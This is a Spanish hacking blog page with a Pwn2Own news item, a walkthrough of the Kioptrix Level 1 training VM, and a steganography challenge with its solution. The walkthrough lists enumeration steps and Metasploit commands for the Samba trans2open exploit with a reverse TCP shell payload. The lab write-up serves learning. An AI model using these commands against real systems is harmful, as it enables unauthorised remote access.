by Pablo Gutierrez | Nov 15, 2018 | hacking, noticias, retos
¡Hackers de sombrero blanco, se reunieron nuevamente para demostrar que lo pueden todo!
iPhoneX, Samsung Galaxy S9, Xiaomi Mi6 estuvieron en la lista de dispositivos “rotos”, las competencias eran simples, Demostrar que hay bugs y se pueden infiltrar a los nuevos sistemas operativos de los dispositivos mobiles, un equipo llamado Fluoroacetate logró estas hazañas en varios dispositivos, entre ellos el iPhone, donde lograron conseguir una foto ya borrada del celular, el premio por este logro era de $50,000, todos los premios rondaban por ese número, y el equipo de Fluoroacetate (fluoroacetato) ganó “Master of Pwn”.
¿Llegaremos a ver mexicanos compitiendo pronto? Eso espero.
by Pablo Gutierrez | Mar 28, 2018 | oscp, retos, whitesuit
Esta máquina Kioptrix VM es un desafío fácil. El objetivo del es adquirir acceso root a través de cualquier medio El objetivo de estos es aprender las herramientas y técnicas básicas para evaluar y explotar la vulnerabilidad. Hay más de una forma en la que se puede completar con éxito el desafío.
Una vez iniciada la maquina nos aparecerá algo como esto:
Como debe de ser una simulación lo mas cercano a una prueba, empezamos buscando la ip de la maquina con el comando
Netdiscover
Como estoy en un ambiente de vmware puedo ver que la ip que corresponde a kioptrix es la 192.168.1.104, ahora necesitamos saber que puertos tiene abiertos o que esta corriendo.
Nmap 192.168.1.104
Una vez que tenemos una idea de que esta corriendo, tenemos varias formas de intentar acceder, despues de checar el puerto 80 no encontre nada, asi que mi segunda opcion es ver que hay en el puerto 139 de Samba.
Smbclient -L 192.168.1.104
Despues de ejecutarlo, se puede ver que tiene samba usa 2.2.1ª, al buscar un poco en google encontre que hay un modulo de metasploit con el cual puedo hacer rce, a esa version, despues de inciar metasploit y configurarlo.
Search trans2open
Use exploit/linux/samba/trans2open
set PAYLOAD linux/x86/shell/reverse_tcp
Set RHOST 192.168.1.104
Set LHOST 192.168.1.69
Una vez terminado, al ponerle exploit, me genera una shell reversa sobre la maquina vulnerable, despues de buscar un rato la bandera la he encontrado en
cat /var/mail/root
Y listo, tenemos la bandera y así es como se termina esta maquina Kioptrix Level 1.
by Pablo Gutierrez | Feb 18, 2018 | retos, whitesuit
En este post me gustaría enseñarles la solución de nuestro ganador, el cual me hizo el favor de documentarlo para compartirlo con ustedes.
Solución Reto Estenografía WhiteSuit Hacking
Problemática: A partir de una imagen proporcionada se debe descifrar el mensaje oculto, que en este caso era el premio a obtener y el correo electrónico destino al cual había que enviar la respuesta.
Nota: A simple vista es una imagen con extensión PNG pero el tamaño del archivo es demasiado grande considerando que es solo una imagen.
- Se cambió la extensión de archivo PNG a RAR y al abrirlo se puede ver que no hay archivos visibles
- Se abre el archivo Reto1.rar con un editor de texto hexadecimal y al revisar todo el texto se detecta que existe un archivo oculto con el nombre Mensaje Oculto.txt
- Para volver visible el archivo Mensaje Oculto.txt dentro el archivo Reto1.rar se debe editar el valor del byte numero 30 anterior al inicio del nombre del archivo pasando del valor 00 (oculto) al valor 74 (visible)
- Al abrir nuevamente el archivo Reto1.rar el archivo oculto con el premio aparece:
- Al abrir el archivo Mensaje Oculto.txt se detecta que el premio viene encriptado:
- Para descifrar el premio se utilizó la herramienta Burp Suite, colocando la cadena de texto contenida en el archivo Mensaje Oculto.txt
¡¡¡Listo, el mensaje oculto con el premio ha sido descubierto!!!
Autor: David Velasquez
Correo: david.velher@protonmail.com
by Pablo Gutierrez | Ene 24, 2018 | retos, whitesuit
En este post creamos un reto de Esteganografia, es muy sencillo y divertido
Pista: la siguiente imagen oculta un mensaje oculto.
El primero en resolver el reto obtendrá un regalo increíble.
Descarga la imagen aquí: https://drive.google.com/open?id=1nGtORaGh4z5xqXx8D0-UTMtORM4jO0U
Recuerda esto es un juego, así que diviértete.
La solución del reto se subiera unos días después de obtener al ganador.
